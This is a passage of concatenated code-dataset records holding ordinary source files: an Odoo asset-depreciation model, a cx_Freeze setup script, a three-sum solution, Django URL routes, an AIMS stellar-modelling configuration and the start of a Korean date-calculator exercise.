norm_fn=data_opts[args['data']]['norm_fn'],\n fsub='feature_means',\n fdiv='feature_stds',\n tmult='target_conv',\n shuffle=True,\n )\n\n valid_gen = DataGenerator(\n data_dir=args['data_dir'] + args['data'] + '/',\n feature_fn=data_opts[args['data']]['test']['feature_fn'],\n target_fn=data_opts[args['data']]['test']['target_fn'],\n batch_size=args['batch_size'],\n norm_fn=data_opts[args['data']]['norm_fn'],\n fsub='feature_means',\n fdiv='feature_stds',\n tmult='target_conv',\n shuffle=False,\n )\n\n net = Network(args, 1)\n\n# save lr model\nnet.save()\nnet.train(train_gen, valid_gen)\n","sub_path":"notebooks/tbeucler_devlog/hp_opt_conservation/baseline.py","file_name":"baseline.py","file_ext":"py","file_size_in_byte":4057,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"588452115","text":"# -*- coding: utf-8 -*-\n# (C) 2013 Smile ()\n# License AGPL-3.0 or later (https://www.gnu.org/licenses/agpl).\n\nfrom dateutil.relativedelta import relativedelta\n\nfrom odoo import api, fields, models, _\nfrom odoo.exceptions import RedirectWarning, ValidationError\n\nfrom .account_asset_asset import ACCOUNT_GROUPS\n\n\nclass AccountAssetDepreciationLine(models.Model):\n _name = 'account.asset.depreciation.line'\n _description = 'Asset Depreciation Line'\n\n @api.model_cr\n def init(self):\n super(AccountAssetDepreciationLine, self).init()\n self._cr.execute(\"\"\"\n SELECT * FROM pg_proc WHERE proname = 'last' AND proisagg;\"\"\")\n if not self._cr.fetchall():\n self._cr.execute(\"\"\"\n-- Create a function that always returns the last non-NULL item\nCREATE OR REPLACE FUNCTION public.last_agg ( anyelement, anyelement )\nRETURNS anyelement LANGUAGE sql IMMUTABLE STRICT AS $$\n SELECT $2;\n$$;\n\n-- And then wrap an aggregate around it\nCREATE AGGREGATE public.last (\n sfunc = public.last_agg,\n basetype = anyelement,\n stype = anyelement\n);\"\"\")\n\n asset_id = fields.Many2one(\n 'account.asset.asset', 'Asset', required=True, ondelete='cascade',\n index=True, auto_join=True)\n depreciation_type = fields.Selection([\n ('accounting', 'Accounting'),\n ('fiscal', 'Fiscal'),\n ('exceptional', 'Exceptional'),\n ], 'Type', required=True, index=True, default='exceptional')\n depreciation_date = fields.Date(\n 'Date', required=True, default=fields.Date.today)\n active = fields.Boolean(default=True)\n company_id = fields.Many2one(\n related='asset_id.company_id', store=True,\n readonly=True, index=True)\n currency_id = fields.Many2one(\n related='asset_id.currency_id', store=True, readonly=True)\n category_id = fields.Many2one(\n related='asset_id.category_id', store=True, readonly=True)\n state = fields.Selection(\n related='asset_id.state', store=True, readonly=True)\n asset_type = fields.Selection(\n related='asset_id.asset_type', store=True, readonly=True)\n benefit_accelerated_depreciation = fields.Boolean(\n related='asset_id.benefit_accelerated_depreciation',\n store=True, readonly=True)\n base_value = fields.Monetary('Base Amount', readonly=True)\n previous_years_accumulated_value = fields.Monetary(\n 'Previous Years Accumulated Depreciation',\n readonly=True, group_operator=\"last\")\n previous_years_accumulated_value_sign = fields.Monetary(\n 'Previous Years Accumulated Depreciation',\n compute='_get_accumulated_value_sign', store=True)\n current_year_accumulated_value = fields.Monetary(\n 'Current Year Accumulated Depreciation',\n readonly=True, group_operator=\"last\")\n current_year_accumulated_value_sign = fields.Monetary(\n 'Current Year Accumulated Depreciation',\n compute='_get_accumulated_value_sign', store=True)\n depreciation_value = fields.Monetary('Depreciation')\n depreciation_value_sign = fields.Monetary(\n 'Depreciation', compute='_get_accumulated_value_sign', store=True)\n accumulated_value = fields.Monetary(\n 'Accumulated Depreciation', readonly=True)\n exceptional_value = fields.Monetary(\n 'Exceptional Depreciation', readonly=True)\n exceptional_value_sign = fields.Monetary(\n 'Exceptional Depreciation',\n compute='_get_accumulated_value_sign', store=True)\n book_value = fields.Monetary('Book value', readonly=True)\n book_value_sign = fields.Monetary(\n 'Book value', compute='_get_accumulated_value_sign', store=True)\n book_value_wo_exceptional = fields.Monetary(\n 'Book value at end without exceptional', readonly=True)\n move_id = fields.Many2one(\n 'account.move', 'Depreciation Entry',\n readonly=True, ondelete='restrict')\n accounting_value = fields.Monetary(\n 'Accounting Depreciation',\n compute='_get_depreciation_values', store=True)\n accelerated_value = fields.Monetary(\n 'Accelerated Depreciation',\n compute='_get_depreciation_values', store=True)\n purchase_value = fields.Monetary(\n 'Gross Value', related='asset_id.purchase_value',\n store=True, readonly=True)\n purchase_value_sign = fields.Monetary(\n 'Gross Value', compute='_get_accumulated_value_sign', store=True)\n salvage_value = fields.Monetary(\n 'Salvage Value', related='asset_id.salvage_value',\n store=True, readonly=True)\n salvage_value_sign = fields.Monetary(\n 'Salvage Value', compute='_get_accumulated_value_sign', store=True)\n year = fields.Char(\"Year\", compute='_get_year', store=True)\n account_id = fields.Many2one(\n 'account.account', 'Account', compute='_get_account', store=True)\n is_posted = fields.Boolean(\n 'Posted Depreciation',\n compute='_get_is_posted', inverse='_set_is_posted', store=True)\n is_posted_forced = fields.Boolean(readonly=True)\n is_manual = fields.Boolean(\n 'Manual Depreciation', compute='_get_is_manual', store=True)\n\n @api.one\n @api.depends('previous_years_accumulated_value',\n 'current_year_accumulated_value',\n 'depreciation_value', 'book_value',\n 'purchase_value', 'exceptional_value',\n 'salvage_value', 'asset_id.asset_type')\n def _get_accumulated_value_sign(self):\n sign = self.asset_id.asset_type == 'purchase_refund' and -1 or 1\n self.previous_years_accumulated_value_sign = \\\n self.previous_years_accumulated_value * sign\n self.current_year_accumulated_value_sign = \\\n self.current_year_accumulated_value * sign\n self.depreciation_value_sign = self.depreciation_value * sign\n self.book_value_sign = self.book_value * sign\n self.purchase_value_sign = self.purchase_value * sign\n self.exceptional_value_sign = self.exceptional_value * sign\n self.salvage_value_sign = self.salvage_value * sign\n\n @api.one\n @api.depends('depreciation_date', 'company_id.fiscalyear_start_day')\n def _get_year(self):\n self.year = self.depreciation_date[:4]\n if self.depreciation_date[5:] < self.company_id.fiscalyear_start_day:\n self.year = str(int(self.year) - 1)\n\n @api.one\n @api.depends('depreciation_type',\n 'category_id.accounting_depreciation_account_id',\n 'category_id.exceptional_depreciation_account_id',\n 'company_id.fiscal_depreciation_account_id')\n def _get_account(self):\n if self.depreciation_type == 'fiscal':\n self.account_id = self.company_id.fiscal_depreciation_account_id\n else:\n self.account_id = self.category_id['%s_depreciation_account_id'\n % self.depreciation_type]\n\n @api.one\n @api.depends('is_posted_forced', 'move_id')\n def _get_is_posted(self):\n self.is_posted = self.is_posted_forced or bool(self.move_id)\n\n @api.one\n def _set_is_posted(self):\n self.is_posted_forced = self.is_posted\n\n @api.one\n @api.depends('depreciation_type',\n 'asset_id.accounting_method',\n 'asset_id.fiscal_method')\n def _get_is_manual(self):\n if self.depreciation_type == 'exceptional':\n self.is_manual = True\n else:\n self.is_manual = self.asset_id[\n '%s_method' % self.depreciation_type] == 'manual'\n\n @api.one\n @api.depends('depreciation_date', 'depreciation_value')\n def _get_depreciation_values(self):\n if self.depreciation_type == 'fiscal':\n self.accounting_value = self.asset_id.depreciation_line_ids. \\\n filtered(\n lambda line: line.depreciation_type == 'accounting' and\n line.depreciation_date == self.depreciation_date\n ).depreciation_value\n self.accelerated_value = self.depreciation_value - \\\n self.accounting_value\n\n @api.one\n @api.constrains('depreciation_value', 'book_value',\n 'book_value_wo_exceptional')\n def _check_constraints(self):\n if self.depreciation_value > self.asset_id.purchase_value:\n raise ValidationError(_(\n 'Depreciation value cannot be bigger than gross value!'))\n if self.book_value > self.book_value_wo_exceptional:\n raise ValidationError(_(\n 'Book value with exceptional depreciations '\n 'cannot be superior to book value '\n 'without exceptional depreciations, '\n 'nor inferior to salvage value!'))\n\n @api.multi\n def button_validate_exceptional_depreciation(self):\n self.validate_exceptional_depreciation()\n return {'type': 'ir.actions.act_window_close'}\n\n @api.multi\n def validate_exceptional_depreciation(self):\n self.mapped('asset_id').compute_depreciation_board()\n return self.post_depreciation_line()\n\n @api.multi\n def write(self, vals):\n if 'active' in vals and not vals.get('active'):\n self._reverse_move(vals)\n return super(AccountAssetDepreciationLine, self).write(vals)\n\n @api.multi\n def _reverse_move(self, vals):\n lines_to_reverse = self.browse()\n if vals.get('is_posted') or vals.get('move_id') or \\\n vals.get('is_posted_forced'):\n lines_to_reverse = self\n elif 'is_posted' not in vals and 'move_id' not in vals and \\\n 'is_posted_forced' not in vals:\n lines_to_reverse = self.filtered(lambda line: line.is_posted)\n if lines_to_reverse:\n lines_to_reverse.with_context(daily_amortization=True). \\\n post_depreciation_line(reverse=True)\n\n @api.multi\n def post_depreciation_line(self, reverse=False):\n if not self:\n return True\n moves = self.env['account.move']\n for line in self:\n if (not line.depreciation_value or line.is_posted) and \\\n not reverse and not self._context.get('asset_output'):\n continue\n if line.depreciation_type == 'fiscal' and \\\n not line.asset_id.benefit_accelerated_depreciation:\n continue\n vals = line._get_move_vals(reverse)\n if vals['line_ids']:\n move = moves.create(vals)\n moves |= move\n if not self._context.get('asset_output'):\n if not line.move_id:\n line.move_id = move\n if not reverse and line.depreciation_type == 'accounting' \\\n and line.book_value != \\\n line.book_value_wo_exceptional:\n vals = line._get_move_vals(\n reverse, 'from_depreciation')\n if vals['line_ids']:\n moves.create(vals)\n vals = line._get_move_vals(\n reverse, 'to_exceptional_amortization')\n if vals['line_ids']:\n moves.create(vals)\n return moves.post()\n\n @api.multi\n def _get_move_vals(self, reverse=False, transfer=None):\n self.ensure_one()\n move_date = self.depreciation_date\n if self._context.get('force_account_move_date'):\n move_date = self._context['force_account_move_date']\n elif self.asset_id.in_service_account_date and \\\n self.depreciation_date < self.asset_id.in_service_account_date:\n move_date = fields.Date.to_string(fields.Date.from_string(\n self.asset_id.in_service_account_date) +\n relativedelta(day=1, months=1) + relativedelta(days=-1))\n msg = _('%s Amortization' % self.depreciation_type.capitalize())\n if transfer:\n msg = _('Exceptional Amortization')\n narration = '%s%s: %s - %s' % (\n self._context.get('asset_output_msg', ''), msg,\n self.asset_id.name, self.depreciation_date)\n journal = self.category_id.depreciation_journal_id or \\\n self.category_id.asset_journal_id\n vals = {\n 'name': journal.sequence_id.\n with_context(ir_sequence_date=move_date).next_by_id(),\n 'narration': narration,\n 'ref': self.asset_id.code,\n 'date': move_date,\n 'journal_id': journal.id,\n 'company_id': self.company_id.id,\n }\n vals['line_ids'] = [\n (0, 0, x)\n for x in self._get_move_line_vals(vals.copy(), reverse, transfer)]\n return vals\n\n @api.multi\n def _get_move_line_vals(self, default=None, reverse=False, transfer=None):\n self.ensure_one()\n amount = self.depreciation_value\n main_related_object = self.category_id\n second_related_object = None\n depreciation_type = '%s_depreciation' % self.depreciation_type\n if transfer:\n depreciation_type = 'exceptional_amortization'\n account_field = '%s_account_id' % depreciation_type\n expense_account_field = '%s_expense_account_id' % \\\n depreciation_type\n income_account_field = '%s_income_account_id' % \\\n depreciation_type\n if self.depreciation_type == 'fiscal':\n if not self.company_id[expense_account_field] or \\\n not self.company_id[income_account_field] or \\\n not self.company_id[account_field]:\n raise RedirectWarning(\n _('Please indicate fiscal amortization '\n 'accounts in company form!'),\n self.env.ref('base.action_res_company_form').id,\n _('Go to company configuration screen'))\n amount = self.accelerated_value\n main_related_object = self.company_id\n if transfer:\n if not self.company_id[expense_account_field] or \\\n not self.company_id[income_account_field]:\n raise RedirectWarning(\n _('Please indicate exceptional amortization '\n 'accounts in company form!'),\n self.env.ref('base.action_res_company_form').id,\n _('Go to company configuration screen'))\n # INFO: always >= 0.0 by defintion, see French law\n amount = self.book_value_wo_exceptional - self.book_value\n second_related_object = self.company_id\n if transfer == 'from_depreciation':\n account_field = 'exceptional_depreciation_account_id'\n elif transfer == 'to_exceptional_amortization':\n amount *= -1.0\n account_field = 'accounting_depreciation_account_id'\n if self._context.get('force_account_move_amount'):\n amount = self._context['force_account_move_amount']\n if not amount:\n return []\n debit, credit = 0.0, abs(amount)\n if (self.asset_type == 'purchase_refund') ^ ((amount < 0.0) ^ reverse):\n debit, credit = abs(credit), abs(debit)\n default = default or {}\n default.update({\n 'partner_id': self.asset_id.supplier_id.id,\n 'currency_id': self.currency_id.id,\n })\n depreciation_line_vals = default.copy()\n depreciation_line_vals.update({\n 'debit': debit,\n 'credit': credit,\n 'account_id': main_related_object[account_field].id,\n 'analytic_account_id':\n self.category_id.asset_analytic_account_id.id,\n 'asset_id': self.asset_id.id,\n })\n expense_or_income_line_vals = default.copy()\n related_object = second_related_object or main_related_object\n account_field = amount > 0 and expense_account_field or \\\n income_account_field\n expense_or_income_line_vals.update({\n 'debit': credit,\n 'credit': debit,\n 'account_id': related_object[account_field].id,\n })\n return [depreciation_line_vals, expense_or_income_line_vals]\n\n @api.multi\n def _transfer_from_accounts_to_others(\n self, accounts_group, old_accounts, new_accounts):\n moves = self.env['account.move']\n last_depreciation_line_by_asset = {}\n for depreciation_line in self:\n amount_field = 'depreciation_value'\n if depreciation_line.depreciation_type == 'fiscal':\n amount_field = 'accelerated_value'\n last_depreciation_line_by_asset[depreciation_line.asset_id] = \\\n depreciation_line, depreciation_line[amount_field]\n context = {'force_account_move_date': fields.Date.today()}\n for depreciation_line, amount in \\\n last_depreciation_line_by_asset.values():\n context['force_account_move_amount'] = amount\n transfer_groups = ['']\n if accounts_group == 'exceptional_amortization':\n transfer_groups = ['from_depreciation',\n 'to_exceptional_amortization']\n for transfer in transfer_groups:\n vals = depreciation_line.with_context(**context). \\\n _get_move_vals(transfer=transfer)\n new_line_vals = []\n for i, j, line_vals in vals['line_ids']:\n for account, group in ACCOUNT_GROUPS.items():\n if group == accounts_group and \\\n account in old_accounts and \\\n line_vals['account_id'] == \\\n old_accounts[account]:\n transfer_vals = line_vals.copy()\n transfer_vals['account_id'] = new_accounts[account]\n line_vals['debit'], line_vals['credit'] = \\\n line_vals['credit'], line_vals['debit']\n new_line_vals.extend(\n [(0, 0, transfer_vals), (0, 0, line_vals)])\n break\n vals['line_ids'] = new_line_vals\n moves |= moves.create(vals)\n return moves.post() if moves else True\n","sub_path":"smile_account_asset/models/account_asset_depreciation_line.py","file_name":"account_asset_depreciation_line.py","file_ext":"py","file_size_in_byte":18422,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"50316610","text":"from cx_Freeze import setup, Executable\r\ntarget = Executable(\r\n\tscript=\"pytest.py\",\r\n\t#base=\"Win32GUI\",\r\n\t#compress=False,\r\n\t#copyDependentFiles=True,\r\n\t#appendScriptToExe=True,\r\n\t#appendScriptToLibrary=False,\r\n\ticon=\"report.ico\"\r\n )\r\n\r\n#includefiles=[\"file.ogg\",\"file.png\",etc]\r\n#includes=[]\r\n#excludes=[]\r\n#packages=[]\r\n\r\nsetup(\r\n name=\"PyTest\",\r\n version=\"1.0\",\r\n description=\"PyTest example\",\r\n author=\"Nikhil Pagote\",\r\n #options={'build_exe': {'excludes':excludes,'packages':packages,'include_files':includefiles}},\r\n executables=[target]\r\n )\r\n \r\n\r\n#pyinstaller.exe --onefile --windowed --icon=app.ico --version-file=version.txt app.py\r\n#pip install --proxy=http://487717:\"password\"@proxy.cognizant.com:6050 nuitka\r\n#nuitka --recurse-on --python-version=3.4 sample.py\r\n#python setup.py build","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":822,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"355706211","text":"'''\nCreated on 2017年3月8日\n\n@author: Luke\n'''\n'''\nclass Solution(object):\n def threeSum(self, nums):\n \"\"\"\n :type nums: List[int]\n :rtype: List[List[int]]\n \"\"\"\n nlist =[]\n nums=sorted(nums)\n for i in range(len(nums)):\n for j in range(i+1,len(nums)):\n for k in range(j+1,len(nums)):\n if(nums[i]+nums[j]+nums[k])==0 and [nums[i],nums[j],nums[k]] not in nlist:\n nlist.append([nums[i],nums[j],nums[k]])\n return nlist\n'''\n'''\n先排序\n運用l,r為左右邊界\n和若是比0小則左邊界往右,比0大右邊界往左\n找到合為0後讓左右邊界都跳過同樣的數字在往中間找\n'''\nclass Solution(object):\n def threeSum(self, nums):\n res = []\n nums.sort()\n #print(nums)\n for i in range(len(nums)-2):\n if i > 0 and nums[i] == nums[i-1]:\n continue\n l, r = i+1, len(nums)-1\n while l < r:\n print(\"i=%d,l=%d,r=%d\"%(i,l,r))\n print(\"nums[%d]=%d,nums[%d]=%d,nums[%d]=%d\\n\"%(i,nums[i],l,nums[l],r,nums[r]))\n s = nums[i] + nums[l] + nums[r]\n if s < 0:\n l +=1 \n elif s > 0:\n r -= 1\n else:\n res.append((nums[i], nums[l], nums[r]))\n while l < r and nums[l] == nums[l+1]:\n l += 1\n while l < r and nums[r] == nums[r-1]:\n r -= 1\n l += 1; r -= 1\n return res\n \n \n\nexample=Solution()\nprint(example.threeSum([-1, 0, 1, 2, -1, -4])) ","sub_path":"015ThreeSum.py","file_name":"015ThreeSum.py","file_ext":"py","file_size_in_byte":1698,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"460724953","text":"from django.urls import path\n\nfrom . import views\napp_name = 'sigaa'\nurlpatterns = [\n # url base ../sigaa/\n path('',views.index,name='index'),\n path('dashboard/',views.dashboard,name='dashboard'),\n path('cadastro/',views.cadastro,name='cadastro'),\n path('cadastro/aluno',views.realizarCadastro,name='realizarCadastro'),\n path('dashboard/cadastrarcurso/',views.cadastrarCurso,name='cadastrarcurso'),\n path('dashboard/cadastrarcurso/cadastrar',views.realizarCadastroCurso,name='realizarCadastroCurso'),\n path('dashboard/listarusuarios/',views.listarUsuarios,name='listarUsuarios'),\n path('dashboard/cadastrarusuario/',views.cadastrarUsuario,name='cadastrarUsuario'),\n path('dashboard/cadastrarusuario/usuario',views.realizarCadastroUsuario,name='realizarCadastroUsuario'),\n]","sub_path":"sigaa/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":803,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"223712587","text":"#!/usr/bin/env python\n# $Id: AIMS_configure.py\n# Author: Daniel R. Reese \n# Copyright (C) Daniel R. Reese and contributors\n# Copyright license: GNU GPL v3.0\n#\n# AIMS is free software: you can redistribute it and/or modify\n# it under the terms of the GNU General Public License as published by\n# the Free Software Foundation, either version 3 of the License, or\n# (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with AIMS. If not, see .\n#\n\nimport math\n\n######################### Parallelisation ##############################\n# NOTE: this is currently implemented with multiprocessing, which duplicates\n# the memory in each process. To be more memory efficient, turn off\n# parallelisation using the \"parallel\" parameter.\nnprocesses = 2 # number of processes (if running in parallel)\nparallel = False #$$$True # specifies whether to run in parallel\n\n######################### EMCEE control parameters #####################\nntemps = 3 #$$$5 # number of temperatures\nnwalkers = 60 #$$$400 # number of walkers (this number should be even)\nnsteps0 = 900 #$$$200 # number of burn-in steps\nnsteps = 1000 #$$$4000 # number of steps\nthin = 10 # thinning parameter (1 out of thin steps will be kept ...)\nthin_comb = 100 # thinning parameter for output linear combinations of models\nPT = True # use parallel tempering?\n\n######################### Initialisation ###############################\ntight_ball = True # initialise with a tight ball around best solution\nmax_iter = 10000 # maximum number of iterations to find walker\n\n# Ranges used around tight ball configuration for walkers.\n# NOTES:\n# - these ranges will be re-centred around the parameters of the\n# best model in the grid\n# - the ranges on parameters related to surface amplitudes will be reset by AIMS\n# - exact names should be used as keys, since AIMS accesses\n# the relevant distributions by using the name as a key.\n# - it doesn't matter if there are supplementary parameters\n# which don't intervene. AIMS will simply ignore them.\n\ntight_ball_range = {}\ntight_ball_range[\"Mass\"] = (\"Gaussian\", [0.0, 0.01])\t# (29/06/16) edited these to 0.005, 0.002, 0.05, 100, 0.1, 0.1, 0.02, 10\ntight_ball_range[\"Z\"] = (\"Gaussian\", [0.0, 0.01])\t# 0.01 0.002 0.05 100 0.5 0.5 0.02 10\ntight_ball_range[\"log_Z\"] = (\"Gaussian\", [0.0, 0.05])\ntight_ball_range[\"X\"] = (\"Gaussian\", [0.0, 0.01])\t# 0.01 0.002 0.05 100 0.5 0.5 0.02 10\n# tight_ball_range[\"log_X\"] = (\"Gaussian\", [0.0, 0.05])\ntight_ball_range[\"Age\"] = (\"Gaussian\", [0.0, 100.0])\ntight_ball_range[\"numax\"] = (\"Gaussian\", [0.0, 0.5])\ntight_ball_range[\"Dnu\"] = (\"Gaussian\", [0.0, 0.5])\ntight_ball_range[\"Radius\"] = (\"Gaussian\", [0.0, 0.01])\ntight_ball_range[\"Teff\"] = (\"Gaussian\", [0.0, 10.0])\ntight_ball_range[\"A_surf\"] = (\"Gaussian\", [0.0, 1.0]) # will be reset by AIMS\ntight_ball_range[\"A3_surf\"] = (\"Gaussian\", [0.0, 1.0]) # will be reset by AIMS\ntight_ball_range[\"Am1_surf\"] = (\"Gaussian\", [0.0, 1.0]) # will be reset by AIMS\n######################### Radial orders ################################\nuse_n = True # use radial orders when comparing observations with models?\nread_n = True # read radial orders from input file?\nassign_n = True # use best model to reassign the radial order?\n # NOTE: this supersedes \"read_n\"\n######################### Constraints ##################################\n# Determines the type of surface correction to include. Options include:\n# - None: don't use any surface corrections\n# - \"Kjeldsen2008\": use surface corrections based on Kjeldsen et al. (2008)\n# - \"Ball2014\": use one-term surface corrections based on Ball & Gizon (2014)\n# - \"Ball2014_2\": use two-term surface corrections based on Ball & Gizon (2014)\nsurface_option = \"Ball2014\"\nb_Kjeldsen2008 = 4.9 # exponent used in the Kjeldsen et al. surface corrections\n\n# Set of seismic constraints to be used. Options include:\n# - \"nu\": individual frequencies\n# - \"r02\", \"r01\", \"r10\": various frequency ratios\n# - \"dnu0\": individual large frequency separation using l=0\n# - \"avg_dnu\": average large frequency separation using all l\n# - \"avg_dnu0\": average large frequency separation using l=0\n# - \"input_dnu\": if using with only dnu and no freqs, use this constraint\n# NOTE: combining \"nu\" with the other constraints leads to a (nearly)\n# singular covariance matrix and is not expected to give good\n# results.\n#seismic_constraints = [\"r02\",\"r01\",\"r10\",\"avg_dnu0\",\"nu_min0\",\t\"input_dnu\",\"alt_input_dnu\"]\nseismic_constraints = ['nu']\n\n######################### Weighting ########################################\n# Determines what type of weighting to apply to seismic and classic contraints.\n# Options include:\n# - None: no weighting\n# - \"Absolute\": absolute weight applied to constraints\n# - \"Relative\": weights applied after normalising the classic and seismic\n# constraints to have the same weight.\n# NOTE: even with the relative weighting, classic_weight is kept as absolute.\nweight_option = \"Absolute\"\nseismic_weight = 1.0\nclassic_weight = 1.0\n\n######################### Input ########################################\nwrite_data = False # set this to True if you want to write a\n # binary grid file\nmode_format = \"simple\" # specifies the format of the files with\n # the mode frequencies. Options include:\n # - \"simple\": the original AIMS format\n # - \"agsm\": the agsm format from ADIPLS\nnpositive = True # only save modes with n >= 0 in binary file\ncutoff = 5.0 # remove frequencies above this value times\n # the acoustic cutoff-frequency\nagsm_cutoff = False # if True, only keep frequencies with icase=10010\n # (i.e. below the cutoff frequency as determined\n # by ADIPLS) in agsm files. This test is in\n # addition to the above user-defined cutoff.\nlist_grid = \"list_MESA_ms_improved\" # file with list of models and characteristics.\n # only used when constructing binary file with\n # the model grid (i.e. write_data == True)\ngrid_params = (\"Mass\",\"X\") # primary grid parameters (excluding age)\t<--------- Can only be the values used in the file name - the set global parameters of each track.\n # only used when constructing binary file with\n # the model grid (i.e. write_data == True)\n # These parameters are used to distinguish\n # evolutionary tracks\nbinary_grid = \"grid_MS_MESA\" # binary file with model grid\n # this file is written to if write_data == True\n # this file is read from if write_data = False\n######################### User-defined parameters ######################\n# This variable allows the user to introduce supplementary parameters in\n# addition to the parameters hard-coded in to AIMS. These parameters\n# can then be used as output parameters (see output_params) and/or even\n# as grid parameters used to define evolutionary tracks (see grid_params).\n#\n# This variable must be a list (or tuple) of pairs of strings. The first\n# string corresponds to the name of the variable which should be used, for\n# instance, in the grid_params and output_params variables. The second\n# string is the fancy latex name for this variable. Allowance needs to\n# be made for a prefix and and postfix (hence the two \"%s\"). These will\n# be replaced by appropriate strings if, for instance, one asks for the\n# log of this parameter.\n\n#user_params = ()\nuser_params = ((\"Xc\", r'Central hydrogen, $%sX_c%s$'),)#(\"DNl1\", r'Period Spacing, $%sDNl1%s$'),)#(\"mHe\", r'Helium Mass'),)\n#user_params = ((\"Xc\", r'Central hydrogen, $%sX_c%s$'), \\\n# (\"alpha_MLT\", r'Mixing length parameter, $%s\\alpha_{\\mathrm{MLT}}%s$'), \\\n# (\"alpha_semi_conv\", r'Semiconvection parameter, $%s\\alpha_{\\mathrm{semi. conv.}}%s$'))\n######################### Priors ######################################\n# The priors are given in a similar format as the tight-ball ranges above.\n# An important difference is that the relevant probability distributions\n# will not be recentred or renormalised (in the case of surface term\n# amplitudes).\n#\n# NOTES:\n# - exact names should be used as keys, since AIMS accesses\n# the relevant distributions by using the name as a key\n# - it doesn't matter if there are supplementary parameters\n# which don't intervene. AIMS will simply ignore them.\n\npriors = {} # The priors will be defined thanks to this\npriors[\"Mass\"] = (\"Uniform\", [0.9, 1.5])\npriors[\"Z\"] = (\"Uniform\", [0.0023, 0.0175])\npriors[\"log_Z\"] = (\"Uniform\", [math.log10(0.0023), math.log10(0.0175)])\npriors[\"X\"] = (\"Uniform\", [0.68, 0.73])\n# priors[\"log_X\"] = (\"Uniform\", [math.log10(0.68), math.log10(0.73)])\npriors[\"Age\"] = (\"Uniform\", [0.0, 2e4])\npriors[\"numax\"] = (\"Uniform\", [0.0, 5.0e3])\npriors[\"A_surf\"] = (\"Uniform\", [-1.0, 1.0]) # this is too broad and will be sent by AIMS\npriors[\"A3_surf\"] = (\"Uniform\", [-1e-12, 1e-12]) # this too broad and should be set experimentally\npriors[\"Am1_surf\"] = (\"Uniform\", [-1e-6, 1e-6]) # this too broad and should be set experimentally\n######################### Interpolation ###############################\nscale_age = True # use a scaled age when interpolating\n######################### Interpolation tests #########################\ntest_interpolation = False # decide whether to test the interpolation.\n # If True, interpolation tests are carried\n # out for the above binary grid, and written\n # in binary format to a file which can\n # subsequently be analysed using plot_test.py.\ninterpolation_file = \"interp_RGB\" # Name of the file to which to\n # write the results from the interpolation\n # tests. This file can be analysed using\n # plot_test.py.\n######################### Output #######################################\n# choice of parameters: \"Mass\", \"Radius\", \"Luminosity\", \"Z\", \"X\", \"Fe_H\",\n# \"M_H\", \"Age\", \"Teff\", \"Dnu\", \"Rho\", \"g\"\n# possible prefixes: \"log_\", \"ln_\", \"exp_\"\n# example: \"log_g\" corresponds to log_{10}(g), where $g$ is the surface gravity\noutput_params = (\"Radius\",\"Mass\",\"log_g\",\"Rho\",\"Age\",\"Teff\",\"X\",\"numax\",\"Dnu\",\"Luminosity\",\"Fe_H\",\"M_H\")#,\"DNl1\")\noutput_dir = \"results\" # name of the root folder with the results\noutput_osm = \"osm\" # name of the root folder with the OSM files\nwith_osm = False # decide whether to write output files for\n # OSM (=Optimal Stellar Model by R. Samadi)\nwith_combinations = True # decide whether to write file with model combinations\nwith_walkers = True # decide whether to plot walkers\nwith_echelle = True # decide whether to plot echelle diagrams\nwith_histograms = True # decide whether to plot histograms\nwith_triangles = True # decide whether to make triangle plots\nwith_rejected = True # decide whether to make triangle plots with accepted/rejected models\nplot_extensions = ['png'] # extensions (and formats) for all simple plots\ntri_extensions = ['png'] # extensions (and formats) for triangle plots\n# supported formats: eps, jpeg, jpg, pdf, pgf, png, ps, raw, rgba, svg, svgz, tif, tiff\nbackend = 'agg' # matplotlib backend with which to produce plots.\n # Options (may differ according to installation):\n # 'pdf', 'pgf', 'Qt4Agg', 'GTK', 'GTKAgg',\n # 'ps', 'agg', 'cairo', 'MacOSX', 'GTKCairo',\n # 'WXAgg', 'template', 'TkAgg', 'GTK3Cairo',\n # 'GTK3Agg', 'svg', 'WebAgg', 'CocoaAgg',\n # 'emf', 'gdk', 'WX'\n # None = use default backend\n # NOTE: some backends (such as 'TkAgg') do not\n # work in batch mode.\n","sub_path":"AIMS-Py35/AIMS_configure.py","file_name":"AIMS_configure.py","file_ext":"py","file_size_in_byte":13156,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"145399900","text":"\"\"\"\nProblem : D2 1948 날짜 계산기(Date Calculator)\n\n월 일로 이루어진 날짜를 2개 입력 받아, 두 번째 날짜가 첫 번째 날짜의 며칠째인지 출력하는 프로그램을 작성하라.\n\n월은 1 이상 12 이하의 정수이며, 각 달의 마지막 날짜는 다음과 같다.\n1/31, 2/28, 3/31, 4/30, 5/31, 6/30, 7/31, 8/31, 9/30, 10/31, 11/30, 12/31\n두 번째 날짜가 첫 번째 날짜보다 항상 크게 주어진다.\n\n가장 첫 줄에는 테스트 케이스의 개수 T가 주어지고, 그 아래로 각 테스트 케이스가 주어진다.\n각 테스트 케이스의 첫 번째 줄에는 4개의 수가 주어진다.\n첫 번째 수가 월을 나타내고 두 번째 수가 일을 나타낸다. 그 다음 같은 형식으로 두 번째 날짜가 주어진다.\n\n출력의 각 줄은 '#t'로 시작하고, 공백을 한 칸 둔 다음 정답을 출력한다.\n(t는 테스트 케이스의 번호를 의미하며 1부터 시작한다.)\n\"\"\"\n\ndef solution():\n \"\"\"월 일로 이루어진 두개의 날짜를 입력 받아 두 번째 날짜가 첫 번째 날짜의 며칠째인지 계산해 결과를 출력한다.\n\n Variables:\n T : 테스트 케이스의 개수\n test_case : 테스트 케이스 리스트\n month : 월별 일 수 리스트\n result : 두 번째 날짜가 첫 번째 날짜의 며칠째인지 계산한 결과값\n pre_month : 첫 번째 날짜의 월\n pre_day : 첫 번째 